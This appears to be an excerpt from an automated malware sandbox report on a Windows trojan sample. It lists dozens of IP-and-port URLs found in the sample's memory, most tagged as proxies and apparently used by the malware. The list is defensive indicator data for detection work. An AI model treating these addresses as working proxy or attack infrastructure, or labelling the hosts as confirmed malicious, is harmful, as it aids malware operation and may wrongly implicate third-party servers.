                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.40.100:30318://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.40.15:30463
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.40.15:30463://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.40.15:31554
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.40.15:31554://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB0C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.40.15:33736
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB0C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.40.15:33736://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.40.89:33054
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.40.89:33054://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.40.89:33054x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.40.89:34006
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.40.89:34006://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.42.105:33132
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.42.105:33132://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.43.142:32471
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.43.142:32471://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.43.59:30886
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.43.59:30886://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.43.69:31403
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.43.69:31403://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C900C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C795B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.43.69:32092
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C795B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.43.69:32092://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.43.69:34336
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.43.69:34336://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.122.245:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.122.245:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.251.1.210:30169
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.251.1.210:30169://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.187:17772
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.187:17772://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.187:43804
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.187:43804://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.187:60083
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.187:60083://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:12005
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:12005://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:47011
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:47011://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:56350
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:56350://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:2466
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:2466://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:25211
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:25211://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:27727
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAB86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:27727://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:28106
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:28106://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA948000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:63218
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA963000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:63218://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:63853
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:63853://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:64947
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.177.90:64947://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9085000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.250:26078
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.250:26078://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF33000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.250:49066
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.250:49066://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.84:58842
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.84:58842://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:39458
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:39458://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7ED3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C755B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:64938
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:64938://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.211.168:28658
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.211.168:28658://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.211.168:57185
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.211.168:57185://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.212:3786
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.212:3786://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.212:48131
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.212:48131://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.213.232:51129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.213.232:51129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.230:46945
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.230:46945://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA923000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:11546
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA923000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:11546://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:25859
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:25859://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC15B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:38538
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:38538://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.135:2911
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.135:2911://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.135:43008
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.135:43008://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.135:59242
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.135:59242://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:36111
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:36111://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64C4000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:39396
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:39396://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC6CC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:41383
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:41383://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:46451
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:46451://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.41.47:40350
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.41.47:40350://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.102.130.120
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.102.130.120://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.102.130.120:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.102.134.2:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.102.134.2:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.102.148.170:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.102.148.170:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.126.101.162:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.126.101.162:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.172.228.208
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.172.228.208://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.172.228.208:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.20.253.102:12551
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.20.253.102:12551://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.20.253.58:12551
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.20.253.58:12551://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.202.172.113
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.202.172.113://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.202.23.207:4995
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.202.23.207:4995://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.210.48.62:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.210.48.62:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.28.141.180:65201
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.28.141.180:65201://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.28.75.112:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.28.75.112:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.50.238.114:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.50.238.114:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.207.196.77:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.207.196.77:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.235.141.35:51921
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.235.141.35:51921://proxy
